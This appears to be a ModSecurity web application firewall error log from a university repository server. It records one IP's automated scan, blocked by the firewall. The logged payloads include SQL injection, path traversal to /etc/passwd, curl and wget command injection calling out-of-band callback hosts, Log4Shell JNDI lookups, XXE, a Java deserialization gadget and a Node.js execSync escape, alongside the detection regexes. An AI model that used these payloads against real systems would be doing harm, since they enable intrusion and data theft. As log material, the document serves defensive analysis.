"OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO10psCo-f0AAAQEGKgAAAAm"]
[Tue Aug 29 11:31:34.534643 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:param: 1' and updatexml(1,concat(0x7e,(SELECT md5(999999999)),0x7e),1)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/api/sms_check.php"] [unique_id "ZO10psCo-f0AAAQEGKwAAAAm"]
[Tue Aug 29 11:31:35.400034 2023] [:error] [pid 1062] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pubid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:pubid: 4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/ebook/bookPerPub.php"] [unique_id "ZO10p8Co-f0AAAQmR3QAAAAH"]
[Tue Aug 29 11:31:36.336101 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-808}${:-319}.${hostName}.username.cjmn8l5jmimk2adbbnlgiex5no9tth988.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/j_security_check"] [unique_id "ZO10qMCo-f0AAAQKOc8AAAAs"]
[Tue Aug 29 11:31:37.382389 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:host:  cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/api/ping"] [unique_id "ZO10qcCo-f0AAAQEGLgAAAAm"]
[Tue Aug 29 11:31:37.399952 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:username: dw1' or 1=1 #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/zms/admin/index.php"] [unique_id "ZO10qcCo-f0AAAPah1UAAAAL"]
[Tue Aug 29 11:31:37.428720 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:discount_code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:discount_code: '  union select sleep(6) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO10qcCo-f0AAAQJWvUAAAAr"]
[Tue Aug 29 11:31:38.308641 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ztd_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ztd_password: $(/bin/wget$IFShttp:/cjmn8l5jmimk2adbbnlghtmz3wiszod66.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/Collector/nms/addModifyZTDProxy"] [unique_id "ZO10qsCo-f0AAAQkBWsAAAAC"]
[Tue Aug 29 11:31:38.409488 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:day. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:day: 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/module/smartblog/archive"] [unique_id "ZO10qsCo-f0AAAQJWvgAAAAr"]
[Tue Aug 29 11:31:38.706760 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:username: ;`curl cjmn8l5jmimk2adbbnlgp3rh1ept1ba36.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/login"] [unique_id "ZO10qsCo-f0AAAP5mJYAAAAM"]
[Tue Aug 29 11:31:39.371146 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:payload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22 ?><! found within ARGS:payload: <?xml version=\\x221.0\\x22 ?><!DOCTYPE a [ <!ENTITY % xxe SYSTEM \\x22http://cjmn8l5jmimk2adbbnlg37ghdsnjj8jgd.oast.site\\x22>%xxe;]>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/carbon/generic/save_artifact_ajaxprocessor.jsp"] [unique_id "ZO10q8Co-f0AAAPMmJkAAAAY"]
[Tue Aug 29 11:31:40.394188 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "repositoryfh.unla.ac.id"] [uri "/Config/SaveUploadedHotspotLogoFile"] [unique_id "ZO10rMCo-f0AAAPDn7oAAAAP"]
[Tue Aug 29 11:31:41.557148 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at REQUEST_COOKIES:wpsc_guest_login_auth. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within REQUEST_COOKIES:wpsc_guest_login_auth: {\\x22email\\x22:\\x22' AND (SELECT 42 FROM (SELECT(SLEEP(6)))NNTu)-- cLmu\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO10rcCo-f0AAAQJWwAAAAAr"]
[Tue Aug 29 11:31:43.355716 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:folder. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:folder: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10r8Co-f0AAAPah2gAAAAL"]
[Tue Aug 29 11:31:44.334173 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "repositoryfh.unla.ac.id"] [uri "/soap.cgi"] [unique_id "ZO10sMCo-f0AAAPDn8EAAAAP"]
[Tue Aug 29 11:31:44.334219 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "repositoryfh.unla.ac.id"] [uri "/soap.cgi"] [unique_id "ZO10sMCo-f0AAAPDn8EAAAAP"]
[Tue Aug 29 11:31:44.356838 2023] [:error] [pid 1024] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:handle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  = ( found within ARGS:handle: com.tangosol.coherence.mvel2.sh.ShellSession(\\x22weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();\\x0d\\x0aweblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();\\x0d\\x0ajava.lang.reflect.Field field = adapter.getClass().getDeclaredField(\\x22connectionHandler\\x22);\\x0d\\x0afield.setAccessible(true);\\x0d\\x0aObject obj = field.get(adapter);\\x0d\\x0aweblogic.servlet.internal.ServletRequestImpl req = (weblog..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/console/css/%2e%2e%2fconsole.portal"] [unique_id "ZO10sMCo-f0AAAQA-@gAAAAi"]
[Tue Aug 29 11:31:44.357627 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:progressfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:progressfile: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/usc-e-shop/functions/progress-check.php"] [unique_id "ZO10sMCo-f0AAAQEGM4AAAAm"]
[Tue Aug 29 11:31:44.384672 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:meta_ids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:meta_ids: 1 AND (SELECT 3066 FROM (SELECT(SLEEP(6)))CEHy)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10sMCo-f0AAAPDn8MAAAAP"]
[Tue Aug 29 11:31:45.432745 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id: (SELECT 1337 FROM (SELECT(SLEEP(6)))MrMV)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10scCo-f0AAAQkBX0AAAAC"]
[Tue Aug 29 11:31:45.465126 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:argumentCollection. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '/></ found within ARGS:argumentCollection: <wddxPacket version='1.0'><header/><data><struct type='xcom.sun.rowset.JdbcRowSetImplx'><var name='dataSourceName'><string>ldap://cjmn8l5jmimk2adbbnlgmypopwwf7qz8r.oast.site/rcrzfd</string></var><var name='autoCommit'><boolean value='true'/></var></struct></data></wddxPacket>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/CFIDE/adminapi/accessmanager.cfc"] [unique_id "ZO10scCo-f0AAAPDn8YAAAAP"]
[Tue Aug 29 11:31:46.375506 2023] [:error] [pid 1029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10ssCo-f0AAAQFcUgAAAAn"]
[Tue Aug 29 11:31:47.413018 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:KEY_LENGTH. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x22..\\x5c found within ARGS:KEY_LENGTH: 1024 -providerclass Si -providerpath \\x22..\\x5cbin\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/RestAPI/Connection"] [unique_id "ZO10s8Co-f0AAANsAVMAAAAD"]
[Tue Aug 29 11:31:47.424227 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10s8Co-f0AAAQNwIcAAAAv"]
[Tue Aug 29 11:31:48.480313 2023] [:error] [pid 1040] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/confluence/pages/createpage-entervariables.action"] [unique_id "ZO10tMCo-f0AAAQQymYAAAAy"]
[Tue Aug 29 11:31:49.336639 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/confluence/pages/createpage-entervariables.action"] [unique_id "ZO10tcCo-f0AAAQnF4kAAAAF"]
[Tue Aug 29 11:31:50.305301 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sgcgoogleanalytic. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)</ found within ARGS:sgcgoogleanalytic: <script>console.log(\\x22document.domain\\x22)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO10tsCo-f0AAAQNwI4AAAAv"]
[Tue Aug 29 11:31:50.319378 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wiki/pages/createpage-entervariables.action"] [unique_id "ZO10tsCo-f0AAAN@5JYAAAAO"]
[Tue Aug 29 11:31:51.336542 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: No boundaries found in payload."] [severity "CRITICAL"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10t8Co-f0AAAN@5J8AAAAO"]
[Tue Aug 29 11:31:51.366263 2023] [:error] [pid 1040] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wiki/pages/createpage-entervariables.action"] [unique_id "ZO10t8Co-f0AAAQQym4AAAAy"]
[Tue Aug 29 11:31:51.408450 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repositoryfh.unla.ac.id"] [uri "/\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\b\\xb7\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlgpzgjenxnhcfk7.oast.site+-H+'User-Agent:+LGgfDE'};\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\b\\xb7\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlg5s77r6ze63uaq.oast.site+-H+'User-Agent:+LGgfDE'};"] [unique_id "ZO10t8Co-f0AAAN@5KIAAAAO"]
[Tue Aug 29 11:31:52.352255 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:document. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:             (() => {\\x0a         found within ARGS:document:             (() => {\\x0a        const process = clearImmediate.constructor(\\x22return process;\\x22)();\\x0a        const result = process.mainModule.require(\\x22child_process\\x22).execSync(\\x22id > build/css/2Udxkf4l8YMdxIMziw7l7YPgbXU.css\\x22);\\x0a        console.log(\\x22Result: \\x22   result);\\x0a        return true;\\x0a    })()        "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/checkValid"] [unique_id "ZO10uMCo-f0AAAQR48wAAAAz"]
